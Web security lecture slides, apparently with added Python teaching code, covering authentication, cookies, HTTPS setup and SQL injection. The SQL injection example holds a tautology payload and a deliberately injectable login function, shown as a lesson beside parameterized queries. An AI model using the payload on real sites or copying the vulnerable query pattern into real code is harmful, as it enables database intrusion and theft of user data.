Web Security
Dr. Theodosis Mourouzis
8 Dec 2015
Web Security Lecture by Dr Theodosis Mourouzis (c)
OUTLINE
• Introduction to Security
• Historical Overview
• Authentication
• Web Architecture
• Threats Landscape
• Secure Online Communication
- Trusted Third Parties (TTP): Certification Authorities (CA)
- SSL/TLS Protocol
- OpenID
OUTLINE
• Web Vulnerabilities
- Account (Username/Password) Enumeration
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
• Remediation Measures
• PCI-DSS Compliance
• Risk Management Framework
• Conclusions
Instructor (Theodosis Mourouzis)
Academia
• BSc in Mathematics (University of Cambridge)
• MSc in Mathematics (University of Cambridge)
• MRes in Security Science (University College London)
• PhD in Information Security & Cryptography (University College London)
• Several awards in national (CY) competitions in mathematics, physics and statistics, and three-time member of the Cyprus National Team at the International Mathematical Olympiad.
• Recipient of the UK University Cipher Champion 2013 award
Professional Experience
• Security Architect in a TSB funded project related to device-centric models
• Security SME at Digital Security & Fraud at Lloyds Banking Group
• Independent Consultant for Security and Analytics
Research Interests
• Fraud Analytics
- Use of big data and analytics to detect/prevent fraud
- Detection of cybersecurity threats
• Security Analysis of Cryptographic Primitives
- Security analysis of systems used for confidentiality and integrity of data
- Russian cryptography (GOST block cipher & hash function)
• Human- and Device-centric Models for Authentication
- Passwords
- Multiple-factor authentication techniques
- Use of the device as an authentication token, with biometrics involved
Motivational Example
Once upon a day … two friends, Alice and Bob, decided to start working on a fabulous start-up idea.
• They connected all major online stores in a clever way and secured goods at very decent prices
• Their idea involved storing (in a database) and processing (online) customers’ credit-card information
The Happy Side
• Customers found a lot of value in the idea and the company’s website started gaining a lot of reputation.
• Huge traffic every week from all around the world!
• Within a year, they were processing the credit-card data of about 100M users worldwide!
• The start-up was not a start-up anymore … but a reputable company with over 100 employees.
• All financial consultants were assuring Alice (the CEO of the company) that her company was going to grow a lot in the coming years.
Motivational Example
The Dark Side
• Unfortunately, Bob (who became the CIO of the company) was neither security aware nor technology-driven
• He declined every spending decision that would have enhanced the company’s online security and information security policy
• One rainy morning … a malicious hacker managed to penetrate the online infrastructure of the company and exposed the database where customers’ credit cards were stored
• The malicious hacker easily “unlocked” the password-protected database … which was protected with the password “BobCIO”
Motivational Example
• The malicious hacker published the database online
• One of the biggest credit-card frauds had just started
• In a few minutes, all the money of about 100M users disappeared
Some really bad consequences for Alice and Bob …
• The media started reporting the incident
• People started damaging the company’s reputation
• All major credit-card players declined to collaborate with the company anymore and sued it for breaching the terms and conditions regarding information security compliance
• Financial and credit-card regulators penalised the company with huge fines
• The company eventually went bankrupt and both the CEO and the CIO are facing jail sentences
Motivational Example
What is the meaning of this example?
What have you really learned from this?
Do you still think security is a science-fiction thing?
Recent Breaches
TalkTalk: a telecom company which provides pay TV and internet access
- Occurred: < 23 Oct 2015
- 150K TalkTalk customers affected
- 15,656 bank accounts hacked
- 4% of 4M customers affected
- Hacked twice last year
- Criticised for lack of information security
Recent Breaches
Lots of examples …
Confidential Data Breaches
Interesting Statistics
• 76% of U.S. companies had a cybersecurity incident within the past 12 months [Source: online.wsj.com]
• 71% of breaches in 2015 occurred in businesses with 100 employees or fewer [Source: Forbes]
• 80% of small businesses that experience a data breach suffer serious financial losses [Source: sileo]
• 22% probability that your company will experience a breach which compromises at least 10K records [Source: Dell]
• It takes 33-365 days for a company to detect or know it has been breached!
• 70% of security incidents that cost enterprises money involve insiders
Food for thought
By the end of this lecture you need to ask yourself …
Do I understand the online threats to my business?
Do I really understand the potential impact of security on my business?
Do I know what I can do about it?
Introduction to Security
What is security?
Introduction to Security
[asset]: people, property and information.
• People may include employees and customers along with other invited persons such as contractors or guests.
• Property assets consist of both tangible and intangible items that can be assigned a value
• Intangible assets include reputation and proprietary information such as databases, software code, critical company records, etc.
Introduction to Security
[Information Security]
The practice of defending information from unauthorized
Access,
Use,
Disclosure,
Disruption,
Modification,
Inspection,
Recording,
Destruction,
etc …
Introduction to Security
Key Concepts
Confidentiality
Integrity
Availability
(known as the CIA triangle)
Non-Repudiation
Authenticity
Introduction to Security
[confidentiality]
• Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information
• Only the authorized recipient is able to reveal the content of a message that is supposed to be confidential
• A set of rules that limits access and/or places restrictions on certain types of information
• Goes back to the beginning of civilization – lots of techniques were developed during wars
Introduction to Security
[confidentiality]
Data Classification
• Restricted
- data protected by state or federal privacy regulations
• Private
- everything not classified as restricted or public
• Public
Introduction to Security
[confidentiality]
Detailed Classification Levels
• Top Secret
• Secret
• Confidential
• Restricted
• Official
• Unclassified
• Clearance
Introduction to Security
[Integrity]
• Protecting the content of a message from alteration during transit, whether on purpose or accidentally
• Guarding against improper information modification or destruction
Introduction to Security
[availability]
• Ensure that the resources you sell or buy are always available
• Ensure timely and reliable access to and use of information
Introduction to Security
[Non-repudiation]
• The sender of a message cannot later deny having sent it
- If you sign a cheque you cannot later deny it
Introduction to Security
[authenticity]
• Make sure that an entity is who it is supposed to be
• Trustworthiness of origin
• Is the page I am visiting online the one it is supposed to be?
Introduction to Security
… and one more requirement, which is more business oriented …
[continuity]: information should be continuously available to the business user, and this is ensured through appropriate business continuity and disaster preparedness
Historical Overview
Historical Overview
• The human desire to communicate secretly is at least as old as writing itself
• This desire goes back to the beginnings of civilization
• The main goal was the transmission of messages in the presence of unauthorized parties, especially during military operations
• Methods of secret communication were developed by many ancient societies
[Figure: Alice sends the message “Hi Bob, bla bla, Alice” to Bob while Eve, sitting between them, sees the same message]
Historical Overview
• Many examples of attempts at secure communication
- Julius Caesar (100 BC)
-- simple transposition ciphers
- WWI: use of radio for exchanging messages
-- need for more secure techniques to prevent interception
- WWII: shift to electromagnetic rotor machines
-- the Enigma machine used by the Germans
Historical Overview
• Julius Caesar (100 BC – 44 BC) – Roman Emperor
• He invented a technique to send messages in a form that prevented unintended persons from reading them
• Even his messenger was not capable of reading the messages
• The technique is known as the Caesar Cipher
Historical Overview
• Message …
“My spies must send me information regarding rivers, water, mountain coordinates and the time the guards are protecting the main gate”
• What an unintended recipient reads …
“Pb vslhv pxvw vhqg ph lqirupdwlrq uhjduglqj ulyhuv, zdwhu, prxqwdlq frruglqdwhv dqg wkh wlph wkh jxdugv duh surwhfwlqj wkh pdlq jdwhrw wr eh, Wkdw lv wkh txhvwlrq”
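As an added example (not code from the lecture slides), the shift cipher above in Python, together with an exhaustive search over its 25 possible keys: the whole key space can be tried by hand, which is why the scheme gives no confidentiality once the method is known. The message is the first clause of the slide's text, reconstructed here with its shift-by-3 ciphertext.

```python
"""Caesar cipher, and why a 25-key cipher gives no real confidentiality.
Added example for this lecture; not code from the original slides."""
import re
import string

ALPHABET = string.ascii_lowercase  # only the 26 Latin letters are shifted


def caesar_shift(text, shift):
    """Shift every Latin letter by `shift` places (a negative shift decrypts).
    Case, spaces and punctuation are left untouched, as on the slide."""
    out = []
    for ch in text:
        if ch.isalpha() and ch.lower() in ALPHABET:
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


# Small word list used to recognise English; enough for the slide's message.
COMMON_WORDS = {"the", "and", "me", "my", "is", "to", "of", "are", "send",
                "must", "that", "time", "water", "main", "gate", "spies"}


def english_score(text):
    """Count how many words of `text` appear in COMMON_WORDS."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)


def brute_force(ciphertext):
    """Try every non-trivial key (1..25) and rank the candidates, best first.
    This is the entire key space: no cleverness is needed, only 25 attempts."""
    candidates = [(k, caesar_shift(ciphertext, -k)) for k in range(1, 26)]
    return sorted(candidates, key=lambda kp: english_score(kp[1]), reverse=True)


def recover_key(ciphertext):
    """Return the key whose decryption looks most like English."""
    return brute_force(ciphertext)[0][0]


# Constructed from the slide: the first clause of Caesar's message and its ciphertext.
PLAINTEXT = "My spies must send me information regarding rivers, water, mountain coordinates"
CIPHERTEXT = "Pb vslhv pxvw vhqg ph lqirupdwlrq uhjduglqj ulyhuv, zdwhu, prxqwdlq frruglqdwhv"

if __name__ == "__main__":
    assert caesar_shift(PLAINTEXT, 3) == CIPHERTEXT
    for key, guess in brute_force(CIPHERTEXT)[:3]:
        print(f"key {key:2d}: {guess}")
```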
Historical Overview
Security evolved tremendously …
- Simple mathematical rules
-- Electromagnetic rotor machines
--- Complex mathematical problems which are hard to solve (elliptic curves, integer factoring)
Security Evolved …
Historical Overview (Different Notions)
Security through obscurity
• Use of the secrecy of the design or implementation to provide security
• Designers of such systems believe that if the flaws are not known, then attackers will be unlikely to find them
• However, a system might still have theoretical or actual security vulnerabilities
• Sometimes used as a defence-in-depth measure
Historical Overview (Different Notions)
Open Security
• Security through obscurity is discouraged and not recommended by standards bodies
• The National Institute of Standards and Technology (NIST) in the US recommends against this practice: “System security should not depend on the secrecy of the implementation or its components”
• Follow open-source philosophies, methodologies and standards when implementing systems
Historical Overview (Different Notions)
Advantages of Open Security
Compatible implementations
Scrutinized and analysed by prominent security experts
All major flaws and vulnerabilities would be revealed quickly
Security is collaboratively improved
Transparency
Risks – Threats – Vulnerabilities
“An asset is what we are trying to protect”
[threat]: anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage or destroy an asset
“A threat is what we’re trying to protect against”
Risks – Threats – Vulnerabilities
Natural Threats: floods, earthquakes, tornadoes, avalanches
Human Threats: events that are either enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network-based attacks, malicious software attacks, unauthorized access to confidential information)
Environmental Threats: long-term power failure, pollution, chemicals, liquid leakage
Risks – Threats – Vulnerabilities
[vulnerability]: a weakness or gap in a security program that can be exploited by threats to gain unauthorized access to an asset
“A vulnerability is a weakness or gap in our protection efforts”
Risks – Threats – Vulnerabilities
[risk]: the potential for loss, damage or destruction of an asset as a result of a threat exploiting a vulnerability
“Risk is the intersection of assets, threats and vulnerabilities”
Risks – Threats – Vulnerabilities
RISK: Business disruption, Financial losses, Loss of privacy, Damage to reputation, Loss of confidence, Legal penalties, Impaired growth, Loss of life
Threats: Angry employees, Dishonest employees, Criminals, Governments, Terrorists, The press, Competitors, Hackers, Nature
Vulnerabilities: Software bugs, Broken processes, Ineffective controls, Hardware flaws, Business change, Legacy systems, Inadequate BCP, Human error
Risks – Threats – Vulnerabilities
NIST threat-vulnerability pairings table:
Authentication
Authentication
Authentication (from Greek: αὐθεντικός) is the method of confirming the truth of an attribute of a single piece of data claimed true by an entity. It is the process of confirming an identity.
Basic Concepts:
[identification]: declare who you are
[entity authentication]: prove it
Authentication
Authentication Factors
Something the user knows: password, partial password, pass-phrase, Personal Identification Number (PIN), security question
Something the user has: wrist band, ID card, security token, cell phone with built-in hardware token
Something the user is: fingerprint, retinal pattern, facial recognition, voice
Authentication
Multiple-Factor Authentication: combining several [INDEPENDENT] authentication techniques together.
Authentication
• [Nowadays] 2-Factor Authentication (2FA) is used to protect money (Internet Banking)
• Shift to 3-factor quite soon
Authentication
Even though the authentication area is widely studied, security still relies on passwords
Password: a string of characters used in authentication to prove identity or access approval in order to gain access to a resource
It MUST be as hard as possible for someone to guess it
Authentication
• A lot of research has focused on formalizing “password strength”
• Many different metrics/policies to ensure strong passwords were introduced
• Password strength: the likelihood that a password cannot be guessed; it varies with the attack algorithm used
- too vague!
- more formal definitions based on entropy and randomness were introduced
Authentication
• Policies to ensure strong passwords are very often introduced
• Security awareness campaigns help people select stronger passwords
Authentication
• However, in the end the selection is done by a HUMAN
• We cannot remember long, complex and random-looking strings
• We tend to make selections that are easy to remember
• We tend to use the same passwords across many different sites
Authentication
A very “secure password” is expected to look like …
A=K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1
Security Design
• We need systems that are both secure and usable … otherwise it will lead to failure
• The two often tend to be inversely related, which implies complex engineering problems and a lot of thinking!
• Imagine a system in which you have to type a 30-character password and you need to carry a security token with you?
Authentication
Password Policies
Password Complexity
- does not contain the user name, real name or company name
- at least 8 characters long
- contains characters from three of the following four categories:
-- Latin uppercase letters (A-Z)
-- Latin lowercase letters (a-z)
-- Base 10 digits (0-9)
-- Special characters (!, $, %, #)
Authentication
Password Policies
Password Expiration
- change passwords periodically (every 1-6 months)
Password Use
- avoid using the same password for accessing multiple accounts
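The complexity and expiration rules of the two policy slides as a checker, plus the entropy-style strength estimate mentioned earlier. This is an added example, not code from the lecture; the 90-day default, the naive entropy estimate and the three-letter minimum for name tokens are assumptions of the example.

```python
"""Password-policy checks matching the lecture's complexity and expiration rules,
plus a naive strength (entropy) estimate. Added example; not code from the slides."""
import math
import re
from datetime import date

# The four character categories from the policy slide.
CATEGORIES = {
    "uppercase": re.compile(r"[A-Z]"),
    "lowercase": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}
# Alphabet sizes used for the entropy estimate (33 printable ASCII specials).
CATEGORY_SIZES = {"uppercase": 26, "lowercase": 26, "digit": 10, "special": 33}


def check_complexity(password, user_name="", real_name="", company=""):
    """Return the list of policy violations (an empty list means acceptable)."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    lowered = password.lower()
    for label, name in (("user name", user_name), ("real name", real_name),
                        ("company name", company)):
        for token in name.split():
            # Assumption: 1-2 letter tokens (initials) are too short to count.
            if len(token) >= 3 and token.lower() in lowered:
                problems.append(f"contains the {label} '{token}'")
    present = [k for k, rx in CATEGORIES.items() if rx.search(password)]
    if len(present) < 3:
        problems.append(f"uses only {len(present)} of the 4 character categories")
    return problems


def estimated_entropy_bits(password):
    """Upper bound on guessing entropy: log2(alphabet ** length), with the alphabet
    being the union of the categories actually used. This assumes uniformly random
    selection, which human-chosen passwords are not, so real strength is lower."""
    alphabet = sum(CATEGORY_SIZES[k] for k, rx in CATEGORIES.items() if rx.search(password))
    return len(password) * math.log2(alphabet) if alphabet else 0.0


def password_expired(changed_on, today, max_age_days=90):
    """Expiration rule: rotate every 1-6 months; 90 days is the assumed default."""
    return (today - changed_on).days > max_age_days


if __name__ == "__main__":
    for pw in ("BobCIO", "A=K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1"):
        print(pw, check_complexity(pw, user_name="bob", company="WidgetCo"),
              f"{estimated_entropy_bits(pw):.1f} bits")
    print("expired:", password_expired(date(2015, 6, 1), date(2015, 12, 8)))
```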
Web Architecture
A fair introduction
Web Architecture
An approach to the design and planning of websites that involves technical, aesthetic and functional criteria.
Focus on the user and on user requirements:
- web content
- usability
- interaction design
- information architecture
- web design
- technology stack
Web Architecture
What is a Web Application?
A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
Web Architecture
Client-Server Architecture (two-tier architecture)
A network architecture in which each computer/process on the network is either a client or a server
Servers are powerful computers or processes dedicated to managing disk drives, printers or network traffic.
Clients are PCs or workstations on which users run applications.
Web Architecture
Example: a client needs to access, for example, Wikipedia or a shopping website like Amazon via his/her browser. The web server is responsible for serving the content requested by the user.
Web Architecture
• Web Servers: Apache HTTP Server, Microsoft IIS (Internet Information Services), Sun Java System Web Server
• Database: the DB is a separate entity, logically (and often physically)
• Data: user data is kept on the browser side
Web Architecture
A client requests content by URL (Uniform Resource Locator)
Protocol: http, ftp, tor, https
Address of the host: translated to an IP address by DNS (e.g. 128.8.127.3)
Web Architecture
Path to a resource
…/index.html (static content – a fixed file returned by the server)
…/apple.php (dynamic content – the server generates the content on the fly)
Web Architecture
HTTP (Hypertext Transfer Protocol) is the Internet application protocol used for communication (exchange of data) between client and server. It runs on top of TCP.
Web Architecture
• User clicks on a website (HTTP request on button click)
Request contains:
- The URL of the resource
- Headers describing what the browser can do
Request types: GET (no server-side effects), POST (data sent to the server – side effects)
Web Architecture HTTP GET Requests
Web Architecture HTTP POST Requests
Web Architecture
A response (after a request) is sent and rendered in the browser
• Response contains:
- Status code: e.g. 200 OK
- Headers describing what the server provides
- Data
- Cookies (represent state the server would like the browser to keep on its behalf – maintain a notion of session)
Web Architecture
COOKIES
• An HTTP cookie is a small piece of data sent from a website and stored in the user’s web browser while the user is browsing that website
• Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user’s previous activity
Applications
• Remember stateful information (e.g. items in a shopping cart)
• Record the user’s browsing activity
• Third-party tracking cookies, used to compile long-term records of individuals’ browsing histories – PRIVACY CONCERN
- EU and US lawmakers took action on this in 2011
• Storing information such as passwords or credit cards
• Authentication cookies: the most common method used by web servers to know whether or not the user is logged in, and with which account. This helps the web server ensure it sends sensitive information only to the legitimate user
Web Architecture
COOKIES
• Cookie parameters are set in a Set-Cookie response header
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: domain=widget.com; path=/; secure; Account=766324
Content-Type: text/html
Content-Length: 327
Date: Tue, 25 Sep 2007 14:15:51 GMT
Web Architecture
COOKIES
COOKIE PARAMETERS
• expires=<date>: determines when the cookie will be deleted
• domain=<domain name>: the cookie will be returned to each domain that ends with this value
• path=<path name>: the cookie will be returned only for requests whose path starts with this value
• secure: if present, the cookie will be returned only with HTTPS (secure HTTP) requests
• <name>=<value>: allows arbitrary data to be stored in a cookie
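An added example (not code from the slides) covering both the response slide and the cookie parameters above: it parses the response shown on the Set-Cookie slide into status, headers and cookies, then applies the expires, domain, path and secure rules to decide whether a later request would carry each cookie. RFC 6265 places name=value first in Set-Cookie while the slide's example places it last, so the parser accepts either order; the second cookie in the sample, with Expires and HttpOnly, is constructed for this example.

```python
"""Parse an HTTP response, pull out its Set-Cookie headers and decide which cookies
a browser would send back on a later request. Added example for this lecture; not
code from the original slides."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Constructed sample: the response from the Set-Cookie slide (line breaks restored)
# plus an invented second cookie carrying Expires and HttpOnly.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: domain=widget.com; path=/; secure; Account=766324\r\n"
    "Set-Cookie: theme=dark; Path=/cart; Expires=Wed, 26 Sep 2007 14:15:51 GMT; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 327\r\n"
    "Date: Tue, 25 Sep 2007 14:15:51 GMT\r\n"
    "\r\n"
    "<html>...</html>"
)

ATTRIBUTES = {"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"}


def utc(year, month, day, hour=0, minute=0):
    """Build a timezone-aware instant (used to evaluate Expires deterministically)."""
    return datetime(year, month, day, hour, minute, tzinfo=timezone.utc)


def parse_response(raw):
    """Split a raw response into status, reason, (name, value) headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    _version, status, reason = status_line.split(" ", 2)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return {"status": int(status), "reason": reason, "headers": headers, "body": body}


def parse_set_cookie(value, origin_host):
    """Any pair whose name is not a known attribute is taken as the cookie itself, so
    both the RFC order and the slide's order parse. Without a Domain attribute the
    cookie is host-only: it is sent back only to the exact host that set it."""
    cookie = {"name": None, "value": None, "domain": origin_host.lower(), "host_only": True,
              "path": "/", "secure": False, "httponly": False, "expires": None}
    for part in value.split(";"):
        raw_key, _, val = part.strip().partition("=")
        key, val = raw_key.strip().lower(), val.strip()
        if key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key == "domain" and val:
            cookie["domain"], cookie["host_only"] = val.lstrip(".").lower(), False
        elif key == "path" and val.startswith("/"):
            cookie["path"] = val
        elif key == "expires":
            cookie["expires"] = parsedate_to_datetime(val)
        elif key and key not in ATTRIBUTES and cookie["name"] is None:
            cookie["name"], cookie["value"] = raw_key.strip(), val
    return cookie


def cookies_from_response(raw, origin_host):
    """All cookies set by the response, as parsed dicts."""
    return [parse_set_cookie(v, origin_host)
            for name, v in parse_response(raw)["headers"] if name == "set-cookie"]


def would_send(cookie, url, now=None):
    """Browser rules: secure needs https; Domain matches the host or a parent domain
    (host-only cookies need an exact match); Path must prefix-match on a '/' boundary;
    a past Expires means the cookie has already been discarded."""
    parts = urlsplit(url)
    host, path = (parts.hostname or "").lower(), parts.path or "/"
    if cookie["secure"] and parts.scheme != "https":
        return False
    if cookie["host_only"]:
        if host != cookie["domain"]:
            return False
    elif host != cookie["domain"] and not host.endswith("." + cookie["domain"]):
        return False
    cpath = cookie["path"]
    if path != cpath and not path.startswith(cpath.rstrip("/") + "/"):
        return False
    if cookie["expires"] is not None and (now or datetime.now(timezone.utc)) >= cookie["expires"]:
        return False
    return True


if __name__ == "__main__":
    for c in cookies_from_response(SAMPLE_RESPONSE, "www.widget.com"):
        print(c["name"], "sent to https://shop.widget.com/checkout/ ?",
              would_send(c, "https://shop.widget.com/checkout/", now=utc(2007, 9, 25, 15)))
```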
Threats Landscape
Threats Landscape
The types of hackers
[Black Hat] A person who hacks into a computer network with malicious or criminal intent.
[Grey Hat] A person whose ethical standards fall somewhere between purely altruistic and purely malicious.
[White Hat] A person who hacks into a computer network in order to test or evaluate the security of the system.
Threats Landscape
Computer system threats come in many forms and in all sorts of shapes and sizes:
• software attacks:
- viruses, worms, malware, Trojan horses
- phishing attacks
• intellectual property theft
• identity theft
• theft of equipment or information
• sabotage
• information extortion
Threats Landscape
[Phishing Attack]
An attack that attempts to acquire sensitive information (such as usernames, passwords and credit card details), often for malicious reasons, by impersonating a trustworthy entity in an electronic communication.
It is usually the first step of a larger attack, such as a malware attack.
Threats Landscape
Risk of phishing grows in social media:
Hackers take advantage of social networks to attack people, since people trust these networks and may not be able to tell that the site being visited, or the program being used, is not real.
Threats Landscape
[malware]: short for “malicious software”, software which is specifically designed to disrupt or damage a computer system, steal personal information or perform unwanted actions on a computer system
Examples:
Viruses
Worms
Trojans
Spyware
Source: PandaLabs Security
Threats Landscape
[social engineering]
A non-technical method of attack that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.
It is one of the greatest threats that organizations encounter today.
Data Breaches
Secure Online Communication
Secure Online Communication
Suppose that your information is transmitted over the network unprotected.
Then anyone who can intercept the traffic can read all your details.
Secure Online Communication
The solution is cryptography!
Secure Online Communication
But are you sure you are connected to the page you are supposed to be connected to?
Secure Online Communication
A Trusted Third Party (TTP) is an entity which facilitates interactions between two parties who both trust the third party.
It is widely used in the electronic transfer of secure data.
The TTP uses cryptography and other security measures to authenticate the identity of the sender, secure the data during transmission and verify delivery to the intended recipient.
Examples: banks, Certification Authorities (CA)
Secure Online Communication
• The SSL/TLS protocol is responsible for securing data travelling from the user’s PC to the server over the Internet
• Its primary goal is to provide privacy and data integrity between two communicating computer applications
1. The connection is private because all data is encrypted
2. The identity of the communicating parties is authenticated and verified by a third party which is a recognized authority
3. Each message is guaranteed to arrive unchanged at the intended recipient
Secure Online Communication
Setting up SSL (HTTPS) on your website
• If you collect ANY sensitive information (username, password) or are involved in any financial transactions, then you need to enable HTTPS
• Any information going to and from the server is automatically encrypted
• SSL prevents hackers from sniffing out your visitors’ sensitive information as it passes through the web
• Visitors feel more secure when the green lock appears, as this means a security certificate is protecting the site
Secure Online Communication
Setting up SSL (HTTPS) on your website
• If you try to open https://www.mywebsite.com it will not work right now
• You need to install an SSL certificate first
• You can set it up in 5 simple steps:
- Host with a dedicated IP address
- Buy a certificate
- Activate the certificate
- Install the certificate
- Update your site to use HTTPS
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 1 [Host with a dedicated IP address]:
• Lots of smaller web hosting plans put you on a shared IP, where multiple other websites use the same address.
• With a dedicated IP you ensure that the traffic going to that IP address is only going to your website and no one else’s.
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 2 [Buy a Certificate]:
• Something that proves your website is your website (think of it like an ID card)
• When a user visits your site, the browser trusts the site by checking the certificate, and everything is encrypted after the “handshake”
• You can create a “self-signed” one, but it is not trusted by modern browsers
• Places to buy certificates
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 3 [Activate the Certificate]:
• The host can possibly do this for you – check
• Generate a Certificate Signing Request (CSR) within your hosting control panel, such as WHM or cPanel.
• Go to the SSL/TLS admin area, choose “Generate an SSL certificate and Signing Request” and fill in the form.
Secure Online Communication
• Copy the first block (you need the CSR to give to the SSL certificate issuer to establish your identity), go to the site of the vendor you bought the certificate from and submit the CSR and any other fields needed.
• It will ask you for an approval email address. This email proves you own the domain, i.e. [email protected]. You need to create it.
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 4 [Install the certificate]:
• The host might do it for you
• If not, paste the certificate into your web host control panel. If you use WHM or cPanel, click “Install an SSL Certificate” under the SSL/TLS menu
• Paste it and submit
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 5 [Update your site to use HTTPS]:
• Now https://www.mywebsite.com works
• However, you need to make sure visitors access your site through HTTPS
• You can enable it for all pages, but you can also do it for a subset of them
Example of Apache server configuration (mod_rewrite) for redirection:
RewriteEngine On
# Only act on plain-HTTP requests
RewriteCond %{HTTPS} off
# Send the cart and checkout pages to their HTTPS equivalents;
# R=301 makes it an external permanent redirect, L stops further rewriting
RewriteRule ^(cart/|checkout/) https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
Important Stuff
• HTTPS does not protect information on your server. It only protects the TRANSFER of data between your visitor’s computer and yours.
• It is your obligation to make sure data is safe on your server
OpenID
• OpenID is an open standard and decentralized protocol by the non-profit OpenID Foundation
• It allows users to be authenticated by co-operating sites, known as Relying Parties (RP), using a third-party service
• The OpenID standard provides a framework for the communication that must take place between the identity provider and the OpenID acceptor (RP)
• An extension to the standard, OpenID Attribute Exchange, facilitates the secure transfer of user attributes, such as name and gender, from the OpenID identity provider to the relying party
• This eliminates the need for webmasters to provide their own ad-hoc systems and allows users to consolidate their “digital identities”
• Users can log into multiple unrelated websites without having to register their information over and over again
• Several large organizations either issue or accept OpenIDs on their websites, according to the OpenID Foundation
- AOL, Blogger, France Telecom, Google, Microsoft, Yahoo! …
- Facebook stopped using OpenID and uses Facebook Connect
• Users create accounts by selecting an OpenID identity provider and then use those accounts to sign on to any website which accepts OpenID authentication
• You rely on the security of the OpenID provider, which is assumed to be very secure
Web Security
What is Web Application Security?
Simply, “The security of web applications”
• End-user security and awareness programs reside in the policies, procedures, and awareness layer of the Defense in Depth model
• User security awareness can affect every aspect of an organization’s security profile
• User awareness is a significant part of a comprehensive security profile because many attack types rely on human intervention
Common Web Application Security Mistakes
• Trusting Client-Side Data
-- Do not TRUST client-side data!
-- Identify all input parameters that trust client-side data
-- Check for un-escaped special characters in input strings:
! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
• Authentication mechanisms using technologies such as JavaScript or ActiveX (hard for developers to understand attacks such as XSS, XSRF)
• Lack of re-authenticating the user before issuing new passwords or performing critical tasks
• Hosting of uncontrolled data on a protected domain
Beware of Identifiable Characteristics
• Comment Lines
• URL Extensions
• Meta Tags
• Cookies
• Client-side scripting languages
• Error and Response Codes
- HTTP Response Headers
- Error Messages
Username/Password Enumeration
• The attacker sends particular requests to the application to check whether it replies in different ways
• The attack works when the web server’s message differs depending on which part of the input was wrong
-- “Invalid Username”, “Incorrect Password”
• The attacker now has some information to proceed with the attack, e.g. a valid username
• The application should not reveal, directly or indirectly, any information useful for enumerating users
• In case of a wrong username/password, the application should return a generic message
SQL Injection
• The attack behind most data breaches
• The attacker’s target is to extract information from the server’s DB
• It is an input validation vulnerability: unsanitized user input placed in an SQL query to the back-end DB changes the meaning of the query
• Typical Login Prompt
• User Input Becomes Part of Query
• Malicious User Input
• SQL Injection Attack
CardSystems Attack (June 2005)
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack!
- Credit card numbers stored unencrypted
- Data on 263,000 accounts stolen
- 43M identities exposed
Countermeasures
• Input Validation
- Filter: apostrophes, semicolons, percent symbols, hyphens, any character with special meaning
- Check the data type
• Whitelisting
- Blacklisting “bad” characters does not really work
- Whitelist a well-defined set of safe values
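Worked example, added here and not part of the lecture, covering the “user input becomes part of the query” slides, the “do not trust client-side data” list and the countermeasures above: a login query built by string concatenation beside its parameterized form, a blacklist filter of the kind the slide lists and a case it cannot catch, and whitelist/data-type checks. The in-memory SQLite table, its rows and the regular expression are constructed for the example; a real system would store password hashes rather than the passwords themselves.

```python
# Added example, not from the slides: the login query built by string
# concatenation (the "user input becomes part of the query" case) beside its
# parameterized form, plus the whitelist/data-type checks from the
# countermeasures list. The in-memory SQLite table and its rows are constructed
# here; real systems store password hashes, not the passwords themselves.
import re
import sqlite3

# Constructed tautology of the kind that turns a login check into "match everything"
TAUTOLOGY = "' OR '1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # BAD: the input is pasted into the SQL text, so quotes in it change the query's meaning
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    # GOOD: bound parameters are always data; a quote inside them is just a character
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# --- Input validation ---------------------------------------------------------

def blacklist_ok(value):
    """The slide's filter list: reject apostrophes, semicolons, percent signs, hyphens."""
    return not any(ch in value for ch in "';%-")


def is_valid_id(value):
    """Data-type check: an id is a non-empty string of digits, nothing else."""
    return value.isdigit()


USERNAME_RE = re.compile(r"[a-z0-9_]{3,32}")


def is_valid_username(value):
    """Whitelist: a well-defined set of safe characters and lengths."""
    return USERNAME_RE.fullmatch(value) is not None


ALLOWED_SORT_COLUMNS = {"id", "username"}


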